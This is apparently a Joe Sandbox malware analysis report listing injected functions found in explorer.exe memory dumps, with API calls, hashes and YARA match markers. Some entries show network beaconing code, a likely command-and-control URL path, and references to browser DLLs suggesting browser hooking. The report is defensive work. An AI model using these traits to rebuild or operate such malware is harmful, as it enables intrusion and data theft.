                                                                                                                                                                  • Instruction ID: 40a2252da6ba4dbc485446185b39673b7e6cde80cb8786200697a6e55204e211
                                                                                                                                                                  • Opcode Fuzzy Hash: 63243f6790e5d17214911157205b1940921de3069c4743449ec7b7d160343d5d
                                                                                                                                                                  • Instruction Fuzzy Hash: 33E17B71205B0487DB28DF6AE89432AB3A1F745B84F84D129DB8B8BB16DF7DD445CB80
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4124047334-0
                                                                                                                                                                  • Opcode ID: 896a6772e18e2a38bb0a991d206c4a7a753a7270d8fb3338d4fd2d51914a43c6
                                                                                                                                                                  • Instruction ID: 6135e5dc1e2338399560460706fa4511c0dcc5c205788204a4af9b80a25fe1f6
                                                                                                                                                                  • Opcode Fuzzy Hash: 896a6772e18e2a38bb0a991d206c4a7a753a7270d8fb3338d4fd2d51914a43c6
                                                                                                                                                                  • Instruction Fuzzy Hash: 04714A64646B00C6EB089F66EC5432A77A1BB86FD1F84D12ADD8E8B766DF3CC045C780
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 09829498
                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 098294A5
                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 098294DA
                                                                                                                                                                    • Part of subcall function 0982EF20: GetWindowsDirectoryA.KERNEL32 ref: 0982EF6C
                                                                                                                                                                    • Part of subcall function 0982EF20: GetVolumeInformationA.KERNEL32 ref: 0982EFB6
                                                                                                                                                                    • Part of subcall function 0982EF20: wsprintfA.USER32 ref: 0982F017
                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 098294FD
                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0982950D
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32 ref: 098295A4
                                                                                                                                                                    • Part of subcall function 098272C0: send.WS2_32 ref: 098274EC
                                                                                                                                                                    • Part of subcall function 098272C0: recv.WS2_32 ref: 09827553
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcmpiA.KERNEL32 ref: 098275B3
                                                                                                                                                                    • Part of subcall function 098272C0: lstrlenA.KERNEL32 ref: 098275D7
                                                                                                                                                                    • Part of subcall function 098272C0: StrStrA.SHLWAPI ref: 098275EF
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcmpiA.KERNEL32 ref: 0982760E
                                                                                                                                                                    • Part of subcall function 098272C0: strtol.MSVCRT ref: 09827626
                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0982951D
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcpyA.KERNEL32 ref: 0982731E
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 0982732F
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827343
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827357
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827368
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 0982737C
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 0982739A
                                                                                                                                                                    • Part of subcall function 098272C0: wsprintfA.USER32 ref: 098273B2
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 098273C6
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 098273DA
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827416
                                                                                                                                                                    • Part of subcall function 098272C0: WSAStartup.WS2_32 ref: 09827426
                                                                                                                                                                    • Part of subcall function 098272C0: socket.WS2_32 ref: 09827442
                                                                                                                                                                    • Part of subcall function 098272C0: gethostbyname.WS2_32 ref: 09827459
                                                                                                                                                                    • Part of subcall function 098272C0: memcpy.MSVCRT ref: 09827479
                                                                                                                                                                    • Part of subcall function 098272C0: htons.WS2_32 ref: 09827488
                                                                                                                                                                    • Part of subcall function 098272C0: connect.WS2_32 ref: 0982749F
                                                                                                                                                                    • Part of subcall function 098272C0: lstrlenA.KERNEL32 ref: 098274B5
                                                                                                                                                                    • Part of subcall function 098272C0: send.WS2_32 ref: 098274CB
                                                                                                                                                                  • memcpy.MSVCRT ref: 098295BC
                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 098295CA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$CriticalSectionlstrcpylstrlen$lstrcmpimemcpysendwsprintf$DirectoryEnterInformationInitializeLeaveStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                  • String ID: /VzCAHn.php?1DC30FADAFF92643095942$1DC30FADAFF92643095942
                                                                                                                                                                  • API String ID: 3667244998-2251421373
                                                                                                                                                                  • Opcode ID: e8196019e5aa11d87cfdbe6b91fda0ce18f79f5cd424b38d00914106e7803aab
                                                                                                                                                                  • Instruction ID: b2e7569f96a858c1f987c0bf88db1d24eee7b8d8218b6e72c63d4b2feda720df
                                                                                                                                                                  • Opcode Fuzzy Hash: e8196019e5aa11d87cfdbe6b91fda0ce18f79f5cd424b38d00914106e7803aab
                                                                                                                                                                  • Instruction Fuzzy Hash: 25516A35209B8185EB50DF25F95835A73A5F79AB84F40801ADA8ECBB36DF3DC189CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4099253644-0
                                                                                                                                                                  • Opcode ID: f28695c1721cc922f6cd581513c1ebbdbf0f108c64f7b85277b68bf9fb14047b
                                                                                                                                                                  • Instruction ID: 8df371ddf2e7a5d717d06d68ae0ea93815e7f7f3c19389edbbe1b2ae50dc3fa7
                                                                                                                                                                  • Opcode Fuzzy Hash: f28695c1721cc922f6cd581513c1ebbdbf0f108c64f7b85277b68bf9fb14047b
                                                                                                                                                                  • Instruction Fuzzy Hash: 56314B61211B0981EF159F15ED503752360AF6AF94F89E62DEA2D8B3E2EF3DC0598381
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0983A1C0: RtlInitializeCriticalSection.NTDLL ref: 0983A1F1
                                                                                                                                                                    • Part of subcall function 0983A1C0: RtlInitializeCriticalSection.NTDLL ref: 0983A1FE
                                                                                                                                                                  • GetModuleHandleA.KERNEL32 ref: 09839960
                                                                                                                                                                  • GetModuleFileNameA.KERNEL32 ref: 0983997A
                                                                                                                                                                  • malloc.MSVCRT ref: 0983999F
                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 098399FA
                                                                                                                                                                  • free.MSVCRT ref: 09839A03
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                  • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                  • API String ID: 308684148-2401417439
                                                                                                                                                                  • Opcode ID: 52db66b71d942326f6a3057831e2c129c17e66db914c7c367b284b4bf96511bd
                                                                                                                                                                  • Instruction ID: ab506604ba744829ca097a8c4ba0ea1345032d62ae5388c1828d44b9d3344558
                                                                                                                                                                  • Opcode Fuzzy Hash: 52db66b71d942326f6a3057831e2c129c17e66db914c7c367b284b4bf96511bd
                                                                                                                                                                  • Instruction Fuzzy Hash: EA518C21318B95C5EE24EF12E8503AA63A5F78AB84FC9C019DE89C7715DF7DC209C780
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1433255627-0
                                                                                                                                                                  • Opcode ID: 85e76e6a571f6c8e61190c0687f8b1d9bdaca75097ac935c84f9baef343490e8
                                                                                                                                                                  • Instruction ID: a2ee10f5d14ec19b1a0fc5f230e3e0271957b326ea098b597f9b7dfb8e454f5f
                                                                                                                                                                  • Opcode Fuzzy Hash: 85e76e6a571f6c8e61190c0687f8b1d9bdaca75097ac935c84f9baef343490e8
                                                                                                                                                                  • Instruction Fuzzy Hash: 98518C76305B8086EB24DF26E85435A73A1FB8AFC4F449029DE4E8BB19DF3DC5458B44
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$_malloc_crtmalloc
                                                                                                                                                                  • String ID: ESA$ESE
                                                                                                                                                                  • API String ID: 2027218043-2868331210
                                                                                                                                                                  • Opcode ID: bbe10e8078358fe23508d738b7d6484acbae767f3e45565ef4f7afcba5aa96c2
                                                                                                                                                                  • Instruction ID: e3a93fe2910682ab1a0e3e51a25975f4ea77627519bf6a471c36c640dcb9bb67
                                                                                                                                                                  • Opcode Fuzzy Hash: bbe10e8078358fe23508d738b7d6484acbae767f3e45565ef4f7afcba5aa96c2
                                                                                                                                                                  • Instruction Fuzzy Hash: CC51A236701B4093EB21DF16F9D031A73A4F788B98F484925AF5D97B10EF38E5A68744
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 09824A00: isdigit.MSVCRT ref: 09824A27
                                                                                                                                                                  • tolower.MSVCRT ref: 098248B8
                                                                                                                                                                    • Part of subcall function 098246A0: malloc.MSVCRT ref: 098246B0
                                                                                                                                                                    • Part of subcall function 098246A0: free.MSVCRT ref: 098246D0
                                                                                                                                                                  • memcpy.MSVCRT ref: 09824939
                                                                                                                                                                  • _errno.MSVCRT ref: 0982493F
                                                                                                                                                                  • strtod.MSVCRT ref: 0982495D
                                                                                                                                                                  • _errno.MSVCRT ref: 098249BA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3554981057-0
                                                                                                                                                                  • Opcode ID: 84ba2e8ffa8c070f8bcb12fe5a57611d4ad0a367bfcb76aaba1e21ae4451d5bc
                                                                                                                                                                  • Instruction ID: 53cea244c1db899102f84333f57218a380082e7dee324dbefe972106afa5484f
                                                                                                                                                                  • Opcode Fuzzy Hash: 84ba2e8ffa8c070f8bcb12fe5a57611d4ad0a367bfcb76aaba1e21ae4451d5bc
                                                                                                                                                                  • Instruction Fuzzy Hash: 8241AF72608B64C6EB21DF32E84472A7AA1F745BC4F41801AEE8687765EF7DC0C5CB50
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$_errno
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2288870239-0
                                                                                                                                                                  • Opcode ID: 3b725809f783826f38bf764d86fb1a527edf3763737b9a1c545297cb61edb90e
                                                                                                                                                                  • Instruction ID: f78919158bbadd0c3aee4eb47c73bc6261297b6b8b6bc5e0f9b18284ff33ab13
                                                                                                                                                                  • Opcode Fuzzy Hash: 3b725809f783826f38bf764d86fb1a527edf3763737b9a1c545297cb61edb90e
                                                                                                                                                                  • Instruction Fuzzy Hash: 04315E26711B0596FF1ADB55ECE136473A8EB8DB94F0CA621DD194E6A0DF3CC7448305
                                                                                                                                                                  APIs
                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 09844482
                                                                                                                                                                  • RaiseException.KERNEL32 ref: 098444AB
                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0984450C
                                                                                                                                                                  • _getptd.LIBCMT ref: 0984445F
                                                                                                                                                                    • Part of subcall function 098423AC: _getptd_noexit.LIBCMT ref: 098423B2
                                                                                                                                                                    • Part of subcall function 098423AC: _amsg_exit.LIBCMT ref: 098423C2
                                                                                                                                                                  • _getptd.LIBCMT ref: 09844511
                                                                                                                                                                  • _getptd.LIBCMT ref: 0984451D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 1037122555-1018135373
                                                                                                                                                                  • Opcode ID: 5e84bfd2dc6374b3e8ed0f893bd8a07073a9945c7d24500524e6b3446befad47
                                                                                                                                                                  • Instruction ID: c58514a6e781bccea52f086967799421bca5cb83730a704eabe933ca95d09274
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e84bfd2dc6374b3e8ed0f893bd8a07073a9945c7d24500524e6b3446befad47
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F21517620478887DB30DF25E44035E77A0FB89BA5F05822ADF9A47BA4CB38D486CB41
                                                                                                                                                                  APIs
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0333C965
                                                                                                                                                                  • _errno.LIBCMT ref: 0333C95A
                                                                                                                                                                    • Part of subcall function 0333E8B0: _getptd_noexit.LIBCMT ref: 0333E8B4
                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0333C9AD
                                                                                                                                                                  • _errno.LIBCMT ref: 0333C9BC
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0333C9C7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                  • Opcode ID: b6d58ceee801837aff8f69e59bdd2d4c32ffc9275c2499d09e72a805d279f6be
                                                                                                                                                                  • Instruction ID: 3993abfc22c268780d4f414510ce71a5a0c4a0c3740941c655c6ef0b17419ff6
                                                                                                                                                                  • Opcode Fuzzy Hash: b6d58ceee801837aff8f69e59bdd2d4c32ffc9275c2499d09e72a805d279f6be
                                                                                                                                                                  • Instruction Fuzzy Hash: 0A21FC62F083C182DF25D76198D433EA290F746BD0F59D321EBA92FB94CA6CC5418B00
                                                                                                                                                                  APIs
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0983D565
                                                                                                                                                                  • _errno.LIBCMT ref: 0983D55A
                                                                                                                                                                    • Part of subcall function 0983F4B0: _getptd_noexit.LIBCMT ref: 0983F4B4
                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0983D5AD
                                                                                                                                                                  • _errno.LIBCMT ref: 0983D5BC
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0983D5C7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                  • Opcode ID: 2adfcd022b29f4b069232f6deb85f175021a57b4f4bffe649ae13fab967bf34b
                                                                                                                                                                  • Instruction ID: 481f3e92caf5d4017f6ea10c511f1834830661b72f4ce3b3f2272c871e73cf6c
                                                                                                                                                                  • Opcode Fuzzy Hash: 2adfcd022b29f4b069232f6deb85f175021a57b4f4bffe649ae13fab967bf34b
                                                                                                                                                                  • Instruction Fuzzy Hash: DD212F627043C482DF105B69958432E52D0B7547D8FD4D62DFBAACBFD8DE6CC5418B81
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2370468470-0
                                                                                                                                                                  • Opcode ID: a9b2bc6439203cc7de76eeccd1541f13a5137cb49eb13da4fc8e40e5f86a03cf
                                                                                                                                                                  • Instruction ID: 5de9e0158d952c6f7fed4c649d3353ddd6834d5b33e11f3928863ad1d4afb097
                                                                                                                                                                  • Opcode Fuzzy Hash: a9b2bc6439203cc7de76eeccd1541f13a5137cb49eb13da4fc8e40e5f86a03cf
                                                                                                                                                                  • Instruction Fuzzy Hash: 4B119321714B4086DB549F63BC4432AB3A5FB8AFD0F489039EE8A8BB15DF7CC1408B44
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrlen$malloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3301496367-0
                                                                                                                                                                  • Opcode ID: b70de2df8b5ea13def80164eecd6f5795553ba9fb1e5a8158d6ae8a0e833ed02
                                                                                                                                                                  • Instruction ID: 0e9d7178a63ccf1cc97a87e12a3e5546bb4fd0e93fc58551a7e361046b8af601
                                                                                                                                                                  • Opcode Fuzzy Hash: b70de2df8b5ea13def80164eecd6f5795553ba9fb1e5a8158d6ae8a0e833ed02
                                                                                                                                                                  • Instruction Fuzzy Hash: 99316B36714B8086DA10CF66E84475AB7A5F789BC4F849029EF8E87B19DF3DC085CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  • _malloc_crt.LIBCMT ref: 09842F89
                                                                                                                                                                    • Part of subcall function 098401E8: malloc.LIBCMT ref: 09840213
                                                                                                                                                                    • Part of subcall function 098401E8: Sleep.KERNEL32 ref: 09840226
                                                                                                                                                                  • free.LIBCMT ref: 0984308A
                                                                                                                                                                  • free.LIBCMT ref: 098430A6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2523592665-0
                                                                                                                                                                  • Opcode ID: 6ddb8c0c28131733b13b743a7376c5917c7c593878d1fa8564931c1e7f0c3d7d
                                                                                                                                                                  • Instruction ID: 71ddf33810de249bd623d7834c6fea906ca78d90789bac6c0165ebc1a3040aeb
                                                                                                                                                                  • Opcode Fuzzy Hash: 6ddb8c0c28131733b13b743a7376c5917c7c593878d1fa8564931c1e7f0c3d7d
                                                                                                                                                                  • Instruction Fuzzy Hash: 8851B532305B0893DB24DF1AEA5035A7364FB98B98F45852AEF5D87B24EF38C0668744
                                                                                                                                                                  APIs
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0334ADCB
                                                                                                                                                                  • _errno.LIBCMT ref: 0334ADC0
                                                                                                                                                                    • Part of subcall function 0333E8B0: _getptd_noexit.LIBCMT ref: 0333E8B4
                                                                                                                                                                  • _errno.LIBCMT ref: 0334AE6E
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0334AE79
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                                                  • Opcode ID: 7b0bc5d5922d1f0b486ee26f59a6a1fc4df732259cf4d008f6642b23cd42d3f4
                                                                                                                                                                  • Instruction ID: e115ec89fdacd116f97036f69e64e793f3c508b14c2b74eb8aba89698be94bc8
                                                                                                                                                                  • Opcode Fuzzy Hash: 7b0bc5d5922d1f0b486ee26f59a6a1fc4df732259cf4d008f6642b23cd42d3f4
                                                                                                                                                                  • Instruction Fuzzy Hash: C74125B6E5039582DF24DB1199C02BAB3E4FB40BD5FCC4216EFA45BA94D738E191C340
                                                                                                                                                                  APIs
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0984B9CB
                                                                                                                                                                  • _errno.LIBCMT ref: 0984B9C0
                                                                                                                                                                    • Part of subcall function 0983F4B0: _getptd_noexit.LIBCMT ref: 0983F4B4
                                                                                                                                                                  • _errno.LIBCMT ref: 0984BA6E
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0984BA79
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                                                  • Opcode ID: 1a03224bb8ec9250c7319079b46cbc1d11abc68a3d1d091dd8c51d37480d4c9a
                                                                                                                                                                  • Instruction ID: 4abbd5425a9b6294a1b47c59fbc23f45ee968f6161bd2cd86e3f782db39aa35a
                                                                                                                                                                  • Opcode Fuzzy Hash: 1a03224bb8ec9250c7319079b46cbc1d11abc68a3d1d091dd8c51d37480d4c9a
                                                                                                                                                                  • Instruction Fuzzy Hash: BF41D072A1139D82DF249F2695406BE7260FF60BD5F88912EFBD597B88E73CC1918340
                                                                                                                                                                  APIs
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 03346B1E
                                                                                                                                                                  • _errno.LIBCMT ref: 03346B13
                                                                                                                                                                    • Part of subcall function 0333E8B0: _getptd_noexit.LIBCMT ref: 0333E8B4
                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03346B9D
                                                                                                                                                                  • _errno.LIBCMT ref: 03346BAE
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 03346BB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                  • Opcode ID: 45ae6b8eb7bddcd1aaf1248ec0fc3f7063edf7fb5169375d5b57e009c998ba17
                                                                                                                                                                  • Instruction ID: ac2e87acdc3824722fd93049b82ba6eefb57decdb9165a8e5357b096173c11f0
                                                                                                                                                                  • Opcode Fuzzy Hash: 45ae6b8eb7bddcd1aaf1248ec0fc3f7063edf7fb5169375d5b57e009c998ba17
                                                                                                                                                                  • Instruction Fuzzy Hash: F8313B76A043A182DF24DF1798D12BD73E0E741BE5B8C812ADBD50BB84E728E551C700
                                                                                                                                                                  APIs
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0984771E
                                                                                                                                                                  • _errno.LIBCMT ref: 09847713
                                                                                                                                                                    • Part of subcall function 0983F4B0: _getptd_noexit.LIBCMT ref: 0983F4B4
                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0984779D
                                                                                                                                                                  • _errno.LIBCMT ref: 098477AE
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 098477B9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                  • Opcode ID: dbc648b1f4bc8b06f77f9a657a40850ba1d35854beab1e5c2e07f06a5c1227d0
                                                                                                                                                                  • Instruction ID: fd9b74cef1de93d25d122af808eac1c3748bea45573b361e12ccb4cc1bffb0d2
                                                                                                                                                                  • Opcode Fuzzy Hash: dbc648b1f4bc8b06f77f9a657a40850ba1d35854beab1e5c2e07f06a5c1227d0
                                                                                                                                                                  • Instruction Fuzzy Hash: 28312B72A042A982DF249F1A95502BD73E0FF60BE5BD4812EFBD687B84DB2CC561C740
                                                                                                                                                                  APIs
                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 03343882
                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0334390C
                                                                                                                                                                  • _getptd.LIBCMT ref: 0334385F
                                                                                                                                                                    • Part of subcall function 033417AC: _getptd_noexit.LIBCMT ref: 033417B2
